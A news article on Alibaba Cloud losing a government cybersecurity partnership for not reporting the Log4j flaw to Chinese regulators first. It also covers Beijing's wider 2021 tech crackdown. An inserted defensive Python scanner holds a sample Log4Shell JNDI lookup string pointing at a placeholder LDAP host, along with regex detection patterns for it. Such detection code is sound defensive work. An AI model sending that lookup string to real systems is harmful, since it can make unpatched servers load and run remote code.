
Alibaba Cloud Deal Nixed by Chinese Regulators Over Failure To Report Log4j Vulnerability

In late November, Alibaba’s security team was the first to notify the Apache Software Foundation (ASF) about the devastating Log4j vulnerability. Though Alibaba Cloud was not known to be compromised, the company is nevertheless facing consequences from Chinese regulators.

The Ministry of Industry and Information Technology (MIIT) is taking Alibaba to task for not reporting the vulnerability to its officials first. The consequence will be a six-month suspension of the cybersecurity partnership between the Chinese government and Alibaba Cloud, something that could be costly for the tech and retail giant. The state is one of its largest customers, and one it has relied on more heavily since ByteDance opted to move to its own international cloud storage earlier this year.

Alibaba Cloud takes a hit over Log4j reporting

As part of a package of new security and data protection regulations passed in 2021, Chinese regulators expect to be informed of discovered vulnerabilities before they are disclosed to the public. The Alibaba researchers, possibly overcome with how serious the Log4j vulnerability (Log4Shell) could be for the world, seem to have overlooked this step.

MIIT has a cooperative partnership with Alibaba Cloud for data sharing regarding cybersecurity threats and monitoring of platforms, something that will apparently be mothballed until mid-2022.

The team at Alibaba initially kept communications with Apache about Log4j confidential due to the seriousness of the vulnerability, but a Chinese blogger leaked inside information about the remediation process on December 8. This forced Apache to hurry out a patch on December 10 as the Log4j issue was easily exploitable even by non-technical actors and could potentially compromise as many as three billion Java-using devices throughout the world.

Alibaba Cloud has responded to the announcement by admitting that it did not notify Chinese regulators in a timely enough fashion and saying that it will work to improve its compliance and risk management posture.

Log4j has certainly thrown a scare into both governments and private enterprise. The security hole came to light via Minecraft, of all places, where gamers discovered that arbitrary code could be executed through the chat feature by getting the remote machine to log a crafted message. Though simple and easy to execute, attacks on Log4j are not so easy to bottle up given the ubiquity of the library (particularly in open source packages that countless servers and sites rely on). While the vulnerability can be fixed by simply updating to the most recent version of Log4j, that does not help consumers or organizations that lack that sort of access to the packages and libraries in which it is embedded (some 8% of all Java artifacts listed on Maven Central, about four times the number affected by the largest previously known security flaws).
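A defender-side illustration of the mechanism just described: vulnerable Log4j versions evaluate `${...}` lookups inside whatever they log, so lookup syntax arriving in a user-controlled field (a chat message, a user agent) is a detection signal worth alerting on. This is an added example, not code from the article or from Alibaba or Apache; the log lines and host names are constructed.

```python
import re

# Constructed sample log lines (not from the article). A chat message and a
# login user agent reach the logger verbatim, the pattern behind Log4Shell.
SAMPLE_LOG = """\
2021-12-10 12:00:01 INFO  chat user=alice msg=hello everyone
2021-12-10 12:00:02 INFO  chat user=bob msg=${jndi:ldap://placeholder.invalid/x}
2021-12-10 12:00:03 INFO  login ua=Mozilla/5.0 (X11; Linux x86_64)
2021-12-10 12:00:04 INFO  login ua=${env:USER}
2021-12-10 12:00:05 INFO  chat user=carol msg=price is $5 {not a lookup}
"""

# Log4j lookup syntax is ${prefix:...}. Legitimate chat text or HTTP headers
# almost never contain it, so the broad pattern catches any lookup, while the
# narrow one flags the JNDI lookup specifically. Matching the generic form
# matters because Log4j resolves nested lookups before logging.
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def classify(line):
    """Return 'jndi', 'lookup' or None for a single log line."""
    if JNDI_LOOKUP.search(line):
        return "jndi"
    if ANY_LOOKUP.search(line):
        return "lookup"
    return None


def scan(text):
    """Return (line_number, kind) for every line carrying lookup syntax."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        kind = classify(line)
        if kind is not None:
            hits.append((number, kind))
    return hits


if __name__ == "__main__":
    for number, kind in scan(SAMPLE_LOG):
        print(f"line {number}: {kind}")
```

Line 5 shows the false-positive guard: a bare `$` or `{` is not a lookup, only the `${...}` pair is.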

Chinese regulators continue to tighten grip on domestic tech firms

Amidst a number of other new laws, Chinese regulators passed the “Provisions on Security Loopholes of Network Products” in September 2021. Under the terms of the law, the government required the Alibaba Cloud team to report the Log4j vulnerability to the manufacturer immediately (which they did) and the MIIT within two days (the part that got them into trouble). MIIT says that it was not aware of the Log4j issue until December 9, the day after it was leaked to the entire internet via the anonymous blogger.

Chinese regulators spent much of 2021 cracking down on private enterprise, particularly the domestic tech sector. In total the new rules and regulations are thought to have erased about $3 trillion in value as the government forbade firms from doing IPOs overseas, suspended apps for not fully complying with privacy laws and issued major fines to some of the country’s largest companies.

According to the government line, the recent rampage by Chinese regulators is meant to promote social stability and strengthen the economy. While it is true that Chinese tech companies have largely been allowed to play fast and loose with user data prior to the past year or two, Beijing also appears to want to steer financial offerings to Shanghai or Hong Kong and also to keep tech platforms from accumulating too much independent power.

Alibaba Cloud is not the first of the Alibaba family to find itself in the crosshairs. In April Alibaba was hit with the largest fine in the country’s history, $2.8 billion, for operating as a monopoly. And the entire campaign by Chinese regulators unofficially kicked off in November of 2020 when Alibaba subsidiary Ant Group had its overseas IPO suddenly pulled by the government, also leading to the mysterious disappearance of Jack Ma for several weeks. Ant Group is estimated to have lost half its value since.

The Chinese government has a pattern of developing (and sticking to) five-year plans. In August, President Xi Jinping announced that the crackdown on tech companies was part of the current five-year plan, so Chinese regulators can be expected to continue with big fines and harsh responses to rule violations for years.